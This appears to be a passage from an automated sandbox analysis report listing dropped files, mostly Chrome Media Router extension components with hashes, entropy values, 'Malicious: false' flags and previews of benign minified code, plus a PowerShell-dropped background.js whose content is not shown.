SSDEEP:	192:d2XprmNaHYkOkAFzrlR/jTcGIEaXV6c8TEKdl:WrT4uozrl/sXV6uml
MD5:	494CE2ACB21A426E051C146E600E7564
SHA1:	D045ECC2A69C963D5D34A148FE4A7939DE6A1322
SHA-256:	A1053F9496ED7FA3C625C94347F07A5E760F514FD8EE142EC9EE64E86B9C063D
SHA-512:	DE2C8498B55749B4D35CF2627E55271F7F09E4560FA16D7094EFB4085CF1E5FAE36F067AAC01AE120548C00DC8AA530EE96079B5CC3E322DF9FF8592799AEB3F
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": "................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": "...........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": ".... $START_LINK$Google Home ....$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_metadata\verified_contents.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8873
Entropy (8bit):	5.791657841286989
Encrypted:	false
SSDEEP:	192:RbhF22gSNenY4QTm7B9rh/xJvrlib6L5Q6wltsYa:LM9xlv
MD5:	934A5882214683DEDF130E1C7E513AFD
SHA1:	4CB84A956148E8F3739681546850996741FDF421
SHA-256:	D87B0B61750D36CEE2647B59213BAAC8B046C9A929C396CAF36F61AF95939F63
SHA-512:	C207CED74351BE35DFFD9B1CB991D18B92DEE7093371374FE725C31F541BD680CF04871543D078103D7951E7F3998EBE5F6A91A45A11562055F5E4BD37FC4AF4
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9hbS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZmxYTGNaVTNJSWstTnZiaDlMb0FDQl9lUDc0ODMtUmlkNXliYnQxczBRMCJ9LHsicGF0aCI6Il9sb2NhbGVzL2FyL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ0REo1Y2kwbU53eG5CNmRjQ3Z6cDZRbjZqaGU0cjk5VTRfMmJYVTZsbXZBIn0seyJwYXRoIjoiX2xvY2FsZXMvYmcvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik5FVEw0bjRHWTdGTUVyQnNWVFVpTDFoTERfdGVBRVJOSkVhZk5HT1FUZ0EifSx7InBhdGgiOiJfbG9jYWxlcy9ibi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWWtEUkRMZktna3h5QXFpNS1YNjN3VWlDYU9DaTJ3ZDg5cHp4dnBmMlR5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiI0OVozYVVUekJxejA3RFFtV2NDMUdGZy1YdW43OXJZOGNJMXRVU1VoNVRNIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6InhaWk1DMlNaT2ZiUl91bHRRWXNtWEdWUGZBaEJfVjNIdHVSeGlQMlhwR0kifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWlBQdnFIMVBHaFIxZkh6Qzd

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\angular.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	607402
Entropy (8bit):	5.38463772575273
Encrypted:	false
SSDEEP:	12288:pA7XbYzz3zA/hJNpwsswmlJp49tkhSZWZhPsFv:q7XbYzD8/hJNhshlJp49tkhSZWZhP6
MD5:	FCE26058E60BD1CF870623C640481A4F
SHA1:	F95B53ABA83D9F2B1206D79020887D8EF019B737
SHA-256:	A9B552276ED7342DC92C240F98C68433E7C711436E285A88E0DE9520F3640925
SHA-512:	51BD481CA8D3A5E21C70A26B69805C62780AFD10476C53FF013D811A6EBA618217D164A03B2C1E5CAC8EFA7E88899C8E14BD53FE452932A13FE8C6E010B9A186
Malicious:	false
Preview:	//third_party/javascript/angular/v1_6/angular.min.js./. AngularJS v1.6.4-local+sha.617b36117. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT./.'use strict';(function(D){'use strict';function te(a){if(G(a))v(a.objectMaxDepth)&&(Uc.objectMaxDepth=ac(a.objectMaxDepth)?a.objectMaxDepth:NaN);else return Uc}function ac(a){return ca(a)&&0<a}function K(a){return function(){var b=arguments[0];var d="["+(a?a+":":"")+b+"] http://errors.angularjs.org/1.6.4-local+sha.617b36117/"+(a?a+"/":"")+b;for(b=1;b<arguments.length;b++){d=d+(1==b?"?":"&")+"p"+(b-1)+"=";var c=encodeURIComponent;var e=arguments[b];e="function"==typeof e?e.toString().replace(/ \{[\s\S]*$/,""):."undefined"==typeof e?"undefined":"string"!=typeof e?JSON.stringify(e):e;d+=c(e)}return Error(d)}}function pa(a){if(null==a\|\|cb(a))return!1;if(J(a)\|\|I(a)\|\|x&&a instanceof x)return!0;var b="length"in Object(a)&&a.length;return ca(b)&&(0<=b&&(b-1 in a\|\|a instanceof Array)\|\|"function"===typeof a.item)}function p(a,b,d){var c;i

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\background_script.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	2088
Entropy (8bit):	5.176623390098955
Encrypted:	false
SSDEEP:	48:g8MBPC3U7en+enInMtQgQ+AlRRZGz+GhI9OuYMZ8vNI:g84Cme+eokD9G+GOkiO
MD5:	47D5838CF5DB13E4E7EF71EC5FC940A1
SHA1:	6AAE6A72DADCD30F0C8D3095E90468996B59ABB7
SHA-256:	E0F0E47CDFE7C7D6E6BB63A789D7C20B05AB8B3F6ADFDF07D08793437F2CCD42
SHA-512:	82515B9B3F154C3B3EA18C62137F07DF8933421C096989ABD0CC4F5A4B3AA06411EE097FAC38475ECB386A6094F99EA9D08CE31D409A41E2757733C4FC86B407
Malicious:	false
Preview:	'use strict';$a("mr.TestProvider");var ay,wx,by=$a("mr.Init"),cy=function(a){void 0!==a.use_views_dialog&&by.info("Using the "+(a.use_views_dialog?"Views (Harmony)":"WebUI")+" dialog.");void 0!==a.enable_cast_sink_query&&by.info("Native Cast MRP is "+(a.enable_cast_sink_query?"disabled":"enabled")+".");void 0!==a.use_mirroring_service&&by.info("Native Mirroring Service is "+(a.use_mirroring_service?"enabled":"disabled")+".")};Dr().init();ay=new ob("MediaRouter.Provider.WakeDuration");wx=new Mx;.var dy=(new Promise(function(a,b){switch(window.location.host){case "enhhojjnijigcajfphajepfemndkmdlo":a();break;case "pkedcjkdefgpdelpbcmbmeomcjbeemfm":chrome.management.get("enhhojjnijigcajfphajepfemndkmdlo",function(c){chrome.runtime.lastError\|\|!c.enabled?a():b(Error("Dev extension is enabled"))});break;default:b(Error("Unknown extension id"))}})).then(function(){return chrome.mojoPrivate&&chrome.mojoPrivate.requireAsync?new Promise(function(a){chrome.mojoPrivate.requireAsync("media_router_bi

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\cast_sender.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	50197
Entropy (8bit):	5.271512845100311
Encrypted:	false
SSDEEP:	1536:SYrnK3OaLzBjUl3YUDNEHruOQVjUR7BELYHppUTnFUbQwTv+4A/SwLGR7gPBJsmL:SYrnKeEzBjUl3YUDNEHruOQVjUR7BELr
MD5:	BBEA05A7844E45C1CF7B7479506DBB0F
SHA1:	4E421EE2CE22E9E10D7CD9BBC0F9FD38C71716FA
SHA-256:	BB77A95786B01BD9D9A0F96B6AEA759E4B4C7CF9275E6B11C819D3BEA867CD8B
SHA-512:	B5F5AF810545F7EB790A1F63B09C093752585401D60DAAF6545BADD444968D47F46263BA6639531C13B1D6182D4CA0CD0718DC3E399DA620C4FE78262A5135F7
Malicious:	false
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:aa(a)}},ca="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},k;.if("function"==typeof Object.setPrototypeOf)k=Object.setPrototypeOf;else{var m;a:{var da={Ub:!0},ea={};try{ea.__proto__=da;m=ea.Ub;break a}catch(a){}m=!1}k=m?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}.var fa=k,n=function(a,b){a.prototype=ca(b.prototype);a.prototype.constructor=a;if(fa)fa(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c]},p=this\|\|self,ha=function(){},q=function(a){var

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\common.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	38099
Entropy (8bit):	5.424217989145786
Encrypted:	false
SSDEEP:	768:xhQXYr24Z15Ey17Pbgw2N8AsdVyjj4DS/U9DSbjvN:xhQXYrzX17PbD2MdV9DLM5
MD5:	B6B210313827B63A322E102627320835
SHA1:	03D4A5DDF7E68F51B73E5C5C1D852D5F50611B8D
SHA-256:	35AD6DB342342660ECE38A8967145228E1458ADDDE750ED4F1DDE6A17F351A15
SHA-512:	5C8C3B5895B541DE6484CC8BFB20E55C2548DBB222B5294C849F3165D139F9F958825384C18C7A8C1836E413CCA1D0C6E9B843254DC1FAA78CBAB50E0BCA712F
Malicious:	false
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.'use strict';var k,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),ea=function(a,b){if(b){var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];e in c\|\|(c[e]={});c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.ea("Symbol",function(a){if(a)return a;var b=function(e,f){this.g=e;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=function(){

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\feedback.css Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3116
Entropy (8bit):	5.0201551881561635
Encrypted:	false
SSDEEP:	48:31YB10fXdq14jTAu0mgs0gwa8J8LZmY1181Y5OGib210bGjKL1rT1hJ14DKtKUHo:nfX8udgaw7mL55cSuoKtHHxOA/x0n
MD5:	D8EE20737329319BFA1ACBB0E6C219A6
SHA1:	D24118D81990E1316CA809669ECB603724C6E7E2
SHA-256:	A582FC20DBCAD1918000B690EB8F237EC14E5B836FD7F799C35702D88DBE6862
SHA-512:	7633682BF161EB1EDE7D62AA9C5E65A727C030DBAA483FEC4F5948C5A5849EFA342A52260097358BF4EF02F07D0464C3356152ABBE4A5C534580960D80594AC9
Malicious:	false
Preview:	:root {. --paper-blue-500: rgb(33, 150, 243);. --paper-blue-500-dark: rgba(33, 150, 243, 0.87);. --paper-blue-500-light: rgba(33, 150, 243, 0.26);.};..body {. font-size: 12px;. height: inherit;.}..#description,.#required-legend {. margin-top: 22px;.}..#description,.#form-buttons,.#required-legend,.#title {. padding: 0 17px;.}...informative {. font-size: 13px;. line-height: 13px;.}..#feedback-confirmation {. width: initial;.}..#feedback-fine-log-warning {. color: rgb(219, 68, 55);. margin: 10px 0;.}..#feedback-type-toggle,..question {. padding: 16px 17px;.}..#form {. -webkit-padding-end: 24px;. -webkit-padding-start: 24px;. background-color: white;. color: rgba(0, 0, 0, 0.87);. box-shadow: 0 1px 4px 0 rgba(0, 0, 0, 0.37);. margin: -100px auto 48px auto;. padding: 34px 17px;. width: 720px;. z-index: 1;.}..#form-buttons {. flex-direction: row;. display: flex;. justify-content: flex-end;. margin-top: 34px;.}..#header {. margin-bottom: 22px;.}..#header-banner {.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\feedback.html Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	15606
Entropy (8bit):	4.340710080778977
Encrypted:	false
SSDEEP:	96:WGEiiDKFK5N+bVfifi5sdUemfOHT5MGTGhCBo5NmsAOZ0RsAOZYu24kJkcdFXOrO:WGESFKrsitdfGO6nrom6mcCswz4TLn
MD5:	0EFADA4B2A95CC2D4AE00F794759D763
SHA1:	FEC3BB7837BE805955601F8C211DC5BE1F16535D
SHA-256:	8CB99506A2ED9BCC6E1A66E0F218524C91304B3EBFCA113D0FECBB3D80078D0D
SHA-512:	7ADF9EA446F06C5BFB203CAE8E0CB97E230E7230D9EC7BEAB8B7F76AC8E9B9CF0FC7395C87D90836D7FDCA57E8F80FD9E0091807B3F902A37F67C69144E49616
Malicious:	false
Preview:	<!DOCTYPE html>.<html ng-app="feedbackApp" ng-controller="FeedbackCtrl". ng-csp xmlns="http://www.w3.org/1999/xhtml" lang="top.language">.<head>. <title>. Chrome Media Router feedback. </title>. <link rel="stylesheet" type="text/css" href="feedback.css">. <link rel="stylesheet" type="text/css" href="material_css_min.css">. <script src="angular.js"></script>. <script type="text/javascript" src="common.js"></script>. <script type="text/javascript" src="feedback_script.js"></script>.</head>.<body>. <div id="header-banner"></div>. <div>. <div id="form">. <div id="header">. <div id="title">. <angular-message key="MEDIA_ROUTER_FEEDBACK_HEADER". desc="Header of the Media Router feedback page.">. Tell us what's happening with Google Cast.. </angular-message>. </div>. <div id="description" class="informative">. <angular-message key="MEDIA_ROUTER_FEEDBACK_FORM_DESCRIPTION". desc="Text to d

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\feedback_script.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	24452
Entropy (8bit):	5.747175355035489
Encrypted:	false
SSDEEP:	384:sJN1cE3zd5m39N/MlzxZibygiLKM9ojX/ySoO4AM5AnshEwR0ChiR5xCzYlBbfTj:sJN1cE3zd5m39N/MlzxZibygiLKM9oj1
MD5:	26F3B1FE17AD7EA58FEB76414A2A9F61
SHA1:	00460DF77358708E951BCD745B388B49D81B7D30
SHA-256:	56686B8D4F0A467D52EA03F503B6F8387742E9F8F3A90AD75C11BC9E3FF243D7
SHA-512:	ED0A78A934AE02B4606919F04B31F7D78E44E4F654DC20107BD214C2B8614A91E47E6ACFCD504EAC95AE3A06238BB04C2417B71075A9D5192E1CF96E3FC6EB5C
Malicious:	false
Preview:	'use strict';/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var sg=function(a,b,c){a.timeOfStartCall=(new Date).getTime();var d=c\|\|w,e=d.document,f=a.nonce\|\|Fa(d);f&&!a.nonce&&(a.nonce=f);if("help"==a.flow){var g=Ha("document.location.href",d);!a.helpCenterContext&&g&&(a.helpCenterContext=g.substring(0,1200));g=!0;if(b&&JSON&&JSON.stringify){var h=JSON.stringify(b);(g=1200>=h.length)&&(a.psdJson=h)}g\|\|(b={invalidPsd:!0})}b=[a,b,c];d.GOOGLE_FEEDBACK_START_ARGUMENTS=b;c=a.serverUri\|\|"//www.google.com/tools/feedback";if(g=d.GOOGLE_FEEDBACK_START)g.apply(d,b);.else{d=c+"/load.js?";for(var m in a)b=a[m],null==b\|\|Na(b)\|\|(d+=encodeURIComponent(m)+"="+encodeURIComponent(b)+"&");a=qg(fg(e),"SCRIPT");f&&a.setAttribute("nonce",f);f=hd(d);te(a,f);e.body.appendChild(a)}};y("userfeedback.api.startFeedback",sg);var tg=function(){this.j=this.h=this.u=this.modelName=this.l=this.g=this.Ac="";this.o=this.m=this.C=!1};var ug=chrome.i18n.getMessage("4163185390680253103"

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\manifest.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	2284
Entropy (8bit):	5.29272048694412
Encrypted:	false
SSDEEP:	48:QWaLGou01ghZ7CsbCypwQdmv7pee3hZq/1C/ao1XJN8U3:DaLrgCWrdmTplZNx
MD5:	F76238944C3D189174DD74989CF1C0C6
SHA1:	85CE141EC8867B699668A5F5A48F404C84FCEB04
SHA-256:	2EF48A1CF322DE356E8844DD2FD3431E8E7ACD04770649B6507EACA5ABDB53A7
SHA-512:	330EC2ADC42A8AE653051694954795664EEECDB1A0E0F7A6BC03349C4FD1568BCC81FF2C4A6D826B07BEA7BED26CC27157A1BFAE4B6FC34B3E121DCE0A5CB26D
Malicious:	false
Preview:	{.. "background": {.. "persistent": false,.. "scripts": [ "common.js", "mirroring_common.js", "background_script.js" ].. },.. "content_security_policy": "default-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; script-src 'self' https://apis.google.com https://feedback.googleusercontent.com https://www.google.com https://www.gstatic.com; child-src https://accounts.google.com https://content.googleapis.com https://www.google.com; connect-src 'self' http://: https://:; font-src https://fonts.gstatic.com; object-src 'self';",.. "default_locale": "en",.. "description": "Provider for discovery and services for mirroring of Chrome Media Router",.. "externally_connectable": {.. "ids": [ "idmofbkcelhplfjnmmdolenpigiiiecc", "ggedfkijiiammpnbdadhllnehapomdge", "njjegkblellcjnakomndbaloifhcoccg" ].. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNTWJoPZ9bT32yKxuuVa9LSEYobjPoXCLX3dgsZ9djDrWKNikTECjdRe3/AFXb+v8jkmmtYQPnOgSYn06J/QodDl

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\material_css_min.css Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	322554
Entropy (8bit):	5.071302554556422
Encrypted:	false
SSDEEP:	6144:5UhKq5pbUqJHPPXLdi6cv+lWUgkgRyrG24CszGR+QAQ4Vy3OSYec3eNk3ksSn+8o:52TFa
MD5:	76EAA4368ED0E83F45B725727414D0E2
SHA1:	CB3ABE758DD77E0AC48F9C9D23DB386E9E52E42E
SHA-256:	3F94B4F2DDAE805F4863FE751B138CB77B24893E3EDE6822E72F0EE4624CD155
SHA-512:	8835E1B06718C86D8AB690E700AAF61E47B8E3F6E64D943EC7D95CDB293499F47D5CE408440E0D636A62D580781D256C204CC3E10735D27E49B53A236A6A19B8
Malicious:	false
Preview:	/!. AngularJS Material Design. * https://github.com/angular/material. * @license MIT. * v1.1.20. */body,html{height:100%;position:relative}body{margin:0;padding:0}[tabindex="-1"]:focus{outline:none}.inset{padding:10px}a.md-no-style,button.md-no-style{font-weight:400;background-color:inherit;text-align:left;border:none;padding:0;margin:0}button,input,select,textarea{vertical-align:baseline}button,html input[type=button],input[type=reset],input[type=submit]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[type=button][disabled],input[type=reset][disabled],input[type=submit][disabled]{cursor:default}textarea{vertical-align:top;overflow:auto}input[type=search]{-webkit-appearance:textfield;box-sizing:content-box;-webkit-box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}input:-webkit-autofill{text-shadow:none}.md-visually-hidden{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_cast_streaming.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	36340
Entropy (8bit):	5.313292965456902
Encrypted:	false
SSDEEP:	384:goitSTmMgVc2sUU1Ryk/kKNNIOGJfwaXaaFHKYpzKSivkhpnfHDETmoxKIRxVLjK:0+/kv/zOSf1HQmcjc6aJ
MD5:	3B822402369E38423E0196F38666E4FF
SHA1:	46003805834146270C8CDD8DD3DC586B96F07962
SHA-256:	E8A4514D5075DBF8D262D601E0BE56D2B9372E70E5F5FB8C6132DEC4D19F9C81
SHA-512:	DA6C98555AD7725D55B65F6D6951E74AD4164B4F42FDE5D8DE86A46AA681DF8D785993DDEBF76B3CA791EE7997F6AE445A24A768C846C12B0F150E0B98943B3D
Malicious:	false
Preview:	'use strict';var ey={TAB:0,ll:1,aq:2},fy=function(){return new kb("MediaRouter.CastStreaming.Session.Launch")},gy=function(){return new qb("MediaRouter.CastStreaming.Session.Length")},hy=function(a){ub("MediaRouter.CastStreaming.Start.Success",a,ey)};var iy=$a("mr.mirror.cast.LogUploader"),ky=function(a,b,c){jy("raw_events.log.gz",a,b,c);return b?"https://crash.corp.google.com/samples?reportid=&q="+encodeURIComponent("UserComments='"+b+"'"):""},jy=function(a,b,c,d){if(0==b.size)iy.info("Trying to upload an empty file to Crash"),d&&d(null);else{var e=new FormData;e.append("prod","Cast");e.append("ver",chrome.runtime.getManifest().version);e.append(a,b);c&&e.append("comments",c);Tv("https://clients2.google.com/cr/report",function(f){f=f.target;.var g=null;cw(f)?(g=ew(f),iy.info("Upload to Crash succeeded: "+g)):iy.info("Upload to Crash failed. HTTP status: "+f.Ja());d&&d(g)},"POST",e,void 0,3E4)}};var ly=function(){this.g=0;km(this)},ny=function(){my\|\|(my=new ly);return my},oy=function()

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_common.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	216089
Entropy (8bit):	5.437746365180903
Encrypted:	false
SSDEEP:	6144:/Pq8hUz7IgBailiepZdRCguW0DY6aNxmLv8L3BN25oMJdxsWTi2xtTYCtKlr7QIC:/Pq8hUz7IgBailiepZdRCguW0DY6aNx2
MD5:	654360FF7FDFFE33D5A6ACFBF724A756
SHA1:	5A6A3F657FDC63FA603EE25F98FD6EB75BBBFCD7
SHA-256:	27116F53D9BF90CA864D92E03CD6DBD3346952109EBF7E4CBF4DD54555D4E92F
SHA-512:	59F1AF3F5BBE9E1DFEB24F895579D213BE1D89D17208734E4A34D58E47160210A4217B95A56CCD09DD8CD12637C70A51EE6B18063205E440113C829CDFDE2495
Malicious:	false
Preview:	'use strict';var yi;var zi=chrome.i18n.getMessage("545449835455981095");y("mr.IssueSeverity",{FA:"fatal",AK:"warning",CE:"notification"});y("mr.IssueAction",{tA:"dismiss",VC:"learn_more"});.var Ai=function(a,b){this.sinkId=this.routeId=null;this.severity=b;this.isBlocking="fatal"==this.severity?!0:!1;this.title=a;this.message=null;this.defaultAction="dismiss";this.helpPageId=this.secondaryActions=null},Ci=function(){var a=new Ai(Bi,"notification");a.helpPageId=6320939;a.defaultAction="learn_more";a.secondaryActions=["dismiss"];return a},Di=function(a,b){a.routeId=b;return a},Ei=function(a,b){a.sinkId=b;return a};var Fi=function(a,b){var c=this;this.h=void 0===b?null:b;this.g=new Promise(function(d,e){var f=function(g){c.h=null;e(g)};c.j=f;a(function(g){c.h=null;d(g)},f)})};Fi.prototype.cancel=function(a){this.j(a);if(this.h){var b=this.h;this.h=null;setTimeout(function(){return b(a)},0)}};var Gi=function(a,b,c){c=void 0===c?null:c;return new Fi(function(d,e){a.g.then(function(f){if(b)t

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_hangouts.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	613714
Entropy (8bit):	5.552151482859797
Encrypted:	false
SSDEEP:	6144:izuonRs/5Hk1tJWW4085JHIWGNcTwBrSuJXiP6YzZnP7rHzSGDZflgi7aN:aIHk1sfaJSPx7rHxfJS
MD5:	6F0D3D6150756440E05FCAB694D5AEEF
SHA1:	E1F15F2E825E41185EAEC2A2EC58A5832E28D50D
SHA-256:	4FB517A0225506801DD60245B833914A99C78C2E929821BDA9072134EEB3C6E0
SHA-512:	DCEEC9E5EBB07601DF100E1F677BC67E1093C28CD9C8BC6E73AC2E5AF66B8AADD5F03EA46233EE78AB5015BDB8752E04D5707031A52B4A1DEBA345A411082282
Malicious:	false
Preview:	'use strict';/. Portions of this code are from MochiKit, received by. The Closure Authors under the MIT license. All other code is Copyright. 2005-2009 The Closure Authors. All Rights Reserved../.var Sz=function(a,b){this.u=[];this.J=a;this.M=b\|\|null;this.C=this.j=!1;this.l=void 0;this.G=this.L=this.D=!1;this.F=0;this.h=null;this.o=0};Sz.prototype.cancel=function(a){if(this.j)this.l instanceof Sz&&this.l.cancel();else{if(this.h){var b=this.h;delete this.h;a?b.cancel(a):(b.o--,0>=b.o&&b.cancel())}this.J?this.J.call(this.M,this):this.G=!0;this.j\|\|this.g(new Tz(this))}};Sz.prototype.H=function(a,b){this.D=!1;Uz(this,a,b)};.var Uz=function(a,b,c){a.j=!0;a.l=c;a.C=!b;Vz(a)},Xz=function(a){if(a.j){if(!a.G)throw new Wz(a);a.G=!1}};Sz.prototype.callback=function(a){Xz(this);Uz(this,!0,a)};Sz.prototype.g=function(a){Xz(this);Uz(this,!1,a)};var Zz=function(a,b,c){return Yz(a,b,null,c)},$z=function(a,b){return Yz(a,null,b,void 0)},Yz=function(a,b,c,d){a.u.push([b,c,d]);a.j&&Vz(a);return a};.Sz.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_webrtc.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	2242
Entropy (8bit):	5.312965902729607
Encrypted:	false
SSDEEP:	48:FgYO8R6tlRIHPoS77t1KEFGVzgeEXUkMoxUA2Lu04fb/1fq:FfP69IHPbmEFGvgmotUuDD1fq
MD5:	D8C34BAD4274AD0795779A88CC53F14E
SHA1:	2E9F20B48CACF79627B231A42561198F369D9D34
SHA-256:	7CF60CF47D4A4D56541E039BF74C10FBE945A6430AD7663C9F7595BFDDC801C8
SHA-512:	BA5157B5EDECA4CCCFDBDE68B7431CB8901D59B97DB914FE421A3951E47F560358B483ED5C7F9BA9FFAC1A0D342222B65D9DCF7D52564482612FB31B0F2036AB
Malicious:	false
Preview:	'use strict';var ima={TAB:0,ll:1,aq:2},Y$=function(a){ub("MediaRouter.WebRtc.Start.Success",a,ima)};var Z$=function(a,b){Hj.call(this,b);this.H=a;this.l=new zb;this.g=$w(b.id);this.m=new zb;this.D=!1;this.o=null;this.F=!1;this.u=this.C=null;jma(this);kma(this);this.g.sendMessage(new Oj("GET_TURN_CREDENTIALS"))};t(Z$,Hj);.Z$.prototype.start=function(a){var b=this;return this.l.g.then(function(c){if(c.g)return Promise.reject(new Ni("Mirroring already started"));if(b.o)return Promise.reject(new Ni("Session permanently stopped"));b.C=new kb("MediaRouter.WebRtc.Session.Launch");c.ia.addStream(a);c.start();return b.m.g})};.Z$.prototype.stop=function(){var a=this;this.m.reject(new Ni("Session stop requested."));this.u&&(this.u.end(),this.u=null);if(this.o)return this.o;this.F=this.D=!1;this.C=null;return this.o=this.l.g.then(function(b){b.stop()}).then(function(){return a.g.dispose()}).catch(function(b){a.g.dispose();throw b;})};.var jma=function(a){a.g.onMessage=function(b){if(!b.type)throw

C:\Users\user\AppData\Roaming\Chrome\background.js Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2732
Entropy (8bit):	4.781612784294275
Encrypted:	false
SSDEEP:	48:9kNuQsxTfbMfpdQ+Cpe1Q3xZRMus9ogxVzoiRK/jDL0MTds5yx7/0:OYQufQPkpMWjMusqgxFo8cTx1F/0
MD5:	550637B95BE684FC1E313C0C412BDE43
SHA1:	613C445D107E3C9DCB591E45C80ED40BEFE1C0A2
SHA-256:	08D5AD9041A7B6628A42BA979B82A7E491C37B889E8B50C4F5A6EE1D56806E89
SHA-512:	B729A70E6544C821345D7499272B8FC04E090DEB7ACA06C7F523DD3B097155D474F1E39FA6FFA3422A63E39D5D1A13AF9F48DCF7356A9A9008D5E89DD511432F
Malicious:	false
